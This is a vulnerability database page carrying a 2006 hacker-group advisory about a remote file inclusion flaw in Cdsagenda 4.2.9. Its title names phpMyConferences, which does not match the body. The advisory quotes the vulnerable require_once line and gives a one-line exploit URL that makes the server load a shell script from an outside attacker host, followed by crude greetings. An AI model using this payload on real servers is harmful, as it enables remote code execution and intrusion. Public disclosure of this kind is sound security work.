Lucene search
Basic search
Lucene search
Search by product
Subscribe
K
Start 30-day trial
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
SIGN IN
Securityvulns
SECURITYVULNS:DOC:14672
History
Oct 13, 2006 - 12:00 a.m.
phpMyConferences <= 8.0.2 Remote File Inclusion
2006-10-13
00:00:00
vulners.com
12
JSON
ToXiC
Cdsagenda 4.2.9 Remote File Inclusion by ToXiC CreW
ToXic Security Italian CreW
BuG FounD by Drago84
Application Affect:
Cdsagenda 4.2.9
Sorce Code:
http://cdsware.cern.ch/cdsagenda/download/cdsagenda-4.2.9.tar.gz
Page:
SendAlertEmail.php
Dir :
/cdsagenda-4.2.9/htdocs/modification/
Problem:
require_once "$AGE/AgeDB.php";
ExPloit :
http://www.site.com/cdsagenda/modification/SendAlertEmail.php?AGE=http://sonic-banda-di-lamer.gay/shell.php
?
GrEatZ All Member of ToXiC, Str0ke
FUCK #Sonic
ToXiC
JSON